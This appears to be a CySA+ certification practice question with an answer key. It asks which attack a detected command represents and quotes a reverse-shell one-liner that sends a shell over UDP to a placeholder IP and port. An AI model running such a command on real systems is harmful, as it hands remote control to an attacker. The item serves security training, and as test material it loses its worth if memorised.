CompTIA CySA+ (CS0-003) — Question 482

A security analyst detects an exploit attempt containing the following command: sh -i >& /dev/udp/10.1.1.1/4821 0>$l
Which of the following is being attempted?

Answer options

• A. RCE
• B. Reverse shell
• C. XSS
• D. SQL injection

Correct answer: B

Explanation

The command attempts to create a reverse shell by redirecting input and output through a UDP connection to the specified IP and port. This is indicative of a reverse shell, where an attacker can gain remote access to the system. Other options like RCE, XSS, and SQL injection do not accurately describe the command's intent or method of exploitation.